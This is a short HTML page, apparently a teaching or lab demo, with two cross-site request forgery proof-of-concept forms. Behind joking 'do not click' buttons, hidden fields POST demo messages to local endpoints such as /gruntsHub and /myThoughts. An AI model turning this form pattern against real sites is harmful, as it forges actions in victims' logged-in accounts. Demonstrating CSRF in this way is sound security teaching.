<!DOCTYPE html>
<html>
    <head>
        <title>Don't click the button!</title>
        <meta charset="UTF-8"/>
    </head>
    <body>
        
        <!--Malicious CSRF proof of concepts-->
        
        <p>Under no circumstances should you click on this button:</p>
        <form action="http://localhost:8080/gruntsHub" method="POST">
            <input type="hidden" value="1337" name="id">
            <input type="hidden" value="CSRF Demo" name="message">
            <input type="submit" value="Warning! Do not click this button!">
        </form>

        <p>Or this button!</p>
        <form action="http://localhost:8080/myThoughts" method="POST">
            <input type="hidden" value="CSRF Demo" name="text">
            <input type="submit" value="You should really not click here...">
        </form>
        
    </body>
</html>